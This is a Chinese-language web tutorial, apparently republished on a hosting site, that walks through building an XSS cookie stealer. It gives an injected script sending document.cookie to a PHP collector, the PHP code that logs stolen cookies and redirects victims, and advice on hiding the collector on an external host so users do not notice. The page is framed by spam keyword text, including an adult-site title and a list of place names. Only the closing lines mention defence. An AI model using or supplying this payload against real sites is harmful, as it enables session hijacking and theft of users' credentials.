91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

JS寫XSS cookie stealer來竊取密碼的步驟詳解

發布時間:2020-09-07 04:04:35 來源:腳本之家 閱讀:309 作者:ang010ela 欄目:web開發

JavaScript是web中最常用的腳本開發語言,js可以自動執行站點組件,管理站點內容,在web業內實現其他有用的函數。JS可以有很多的函數可以用做惡意用途,包括竊取含有密碼等內容的用戶cookie。

Cookie是站點請求和保持特定訪問頁面的信息。Cookie含有訪問的方式、時間、用戶名密碼等認證信息等。當用戶訪問給定站點時,必須使用cookie;如果攻擊者可以攔截cookie,就可以利用cookie竊取用戶的一些信息。對某個特定的域名,使用JS可以保存或修改用戶的cookie。也就是說,如果攻擊者可以利用JS查看、修改cookie,那么這可以變成一種有價值的黑客技術。

基于JS的攻擊可以有效地與代碼注入等技術相結合,這可能造成惡意代碼在可信的網站上執行。

下面開始創建XSS cookie stealer

Step 1: 創建 HTML Test 頁

首先,創建一個標準的HTML頁

mkdir cookiestealer
cd cookiestealer
touch index.html

JS寫XSS cookie stealer來竊取密碼的步驟詳解

然后,編輯index.html

nano index.html
<html>
<body>
</body>
</html>

測試頁面

JS寫XSS cookie stealer來竊取密碼的步驟詳解

Step 2: 創建Cookie

創建一個可以插入到cookie中的基本參數——字符串。這個cookie只能用于本頁面中,同樣的,之后的注入也應用于該頁面保存的所有cookie。

 <script type="text/javascript">document.cookie = "username=Null Byte";</script>

該腳本要插入到HTML的<body>部分,如下:

JS寫XSS cookie stealer來竊取密碼的步驟詳解

如果運行該腳本的頁面打開了,那么就會設定cookie,但是瀏覽器中不會顯示任何東西。我們可以用document.write函數直接查看cookie。

document.write(document.cookie);

同樣功能的腳本如下:

 <script type="text/javascript">
 document.cookie = "username=Null Byte";
 document.write(document.cookie);
 </script>

JS寫XSS cookie stealer來竊取密碼的步驟詳解

在瀏覽器中打開頁面,就會出現如下的cookie信息:

JS寫XSS cookie stealer來竊取密碼的步驟詳解

說明我們成功地為這個頁面設置了"username=Null Byte" 的cookie。

Step 3: 用js腳本竊取Cookies

我們用來傳遞cookies到服務器的js字符串使用了document.cookie參數,但是我們用的是document.location中定義的url。

document.location='http://127.0.0.1/cookiestealer.php?c='+document.cookie;

在本例中,PHP文件定位到localhost(127.0.0.1)。

如果目標是社交媒體網站,腳本需要注入到該站點中,竊取的cookies要發送給黑客控制的IP或URL。

把js代碼嚇到<script>標簽中:

<script type="text/javascript">
 document.location='http://127.0.0.1/cookiestealer.php?c='+document.cookie;
 </script>

HTML頁面代碼應該是下面這樣:

JS寫XSS cookie stealer來竊取密碼的步驟詳解

剩下對cookie進行處理的部分需要PHP來處理。

Step 4: 用PHP處理Cookies

在上面的例子中,竊取cookie的PHP文件是cookiestealer.php,位于127.0.0.1網址下。

在實際運行中,不能用cookiestealer.php這么明顯的名字,而且應該位于外部IP或URL下。

首先,在index.html相同目錄下創新PHP文件。

nano cookiestealer.php

第一個元素需要定義的是重定向頁面跳轉。

<?php
header ('Location:https://google.com');
?>

為了不讓用戶意識到可能遭到攻擊,最好重定向用戶到相同域下的其他頁面,這樣用戶就不會意識到。

JS寫XSS cookie stealer來竊取密碼的步驟詳解

重定向完成后,需要其他代碼來處理cookie。

1. 分配cookie到一個變量;

$cookies = $_GET"c";

2. 定義保存cookie的文件,這個文件保存的位置應該是我們控制的。

本例中,文件名為log.txt。

 $file = fopen('log.txt', 'a');

3. 把上面的兩個參數的內容寫入log文件,即將cookie寫入log.txt。

fwrite($file, $cookies . "nn");

代碼如下:

JS寫XSS cookie stealer來竊取密碼的步驟詳解

然后,需要準備PHP文件的測試環境。

Step 5: 測試Cookie Stealer

在index.html 和 cookiestealer.php相同目錄下,搭建一個測試用的PHP環境。

php -S 127.0.0.1:80

JS寫XSS cookie stealer來竊取密碼的步驟詳解

頁面測試成功。

JS寫XSS cookie stealer來竊取密碼的步驟詳解

打開頁面之后,瀏覽器會馬上重定向到預定義的網站,即Google。

JS寫XSS cookie stealer來竊取密碼的步驟詳解

查看PHP服務器的日志,我們注意到傳遞給php文件一個參數,而且php代碼執行了。

JS寫XSS cookie stealer來竊取密碼的步驟詳解

最后,我們可以檢查我們網站目錄下的log.txt文件來查看cookies。

cat log.txt

JS寫XSS cookie stealer來竊取密碼的步驟詳解

Log文件中含有cookie的內容,說明我們成功的使用js代碼竊取了cookies。

Step 6: 攻擊

Cookies含有重要的用戶信息,一般是明文的,有時甚至含有私鑰信息。所以非常重要,使用js代碼注入可以竊取用戶的cookies信息。

該攻擊可以注入到任何的HTML文件的<script>標簽中。常用的檢測XSS的方法是使用alert。

<script>alert("Alert");</script>

該腳本會嘗試打開類似下面的alert信息。如果打開了,說明網站易受到xss攻擊。

JS寫XSS cookie stealer來竊取密碼的步驟詳解

在現實的攻擊中,黑客會特別注意PHP文件的位置。如果處理得不好,php文件會容易暴露黑客的位置。如果這種攻擊出現了,那么根據cookie被發送和保存的位置,可以追蹤黑客。

上面的方法說明了JS作為攻擊工具的強大性。JS可以讓web更方便 ,如果某個網站易受到惡意JS注入,這會給用戶和網站帶來巨大的安全威脅。預防XSS攻擊的重擔落在了web開發者的身上。如果用戶認為運行在網站上的腳本是不可信的,也可以使用NoScript來阻止js代碼的運行。

總結

以上所述是小編給大家介紹的JS寫XSS cookie stealer來竊取密碼的步驟詳解,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對億速云網站的支持!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

宁晋县| 吉林省| 五家渠市| 枣强县| 长岛县| 瑞丽市| 藁城市| 阿尔山市| 弋阳县| 霍邱县| 天镇县| 斗六市| 甘孜县| 杭州市| 元朗区| 高密市| 孟津县| 科技| 南江县| 磐安县| 咸阳市| 乌兰浩特市| 寿光市| 柳州市| 吴忠市| 和顺县| 库伦旗| 文成县| 文登市| 龙南县| 宜城市| 招远市| 沂水县| 城步| 镇沅| 苍溪县| 丹江口市| 建宁县| 互助| 赣州市| 岗巴县|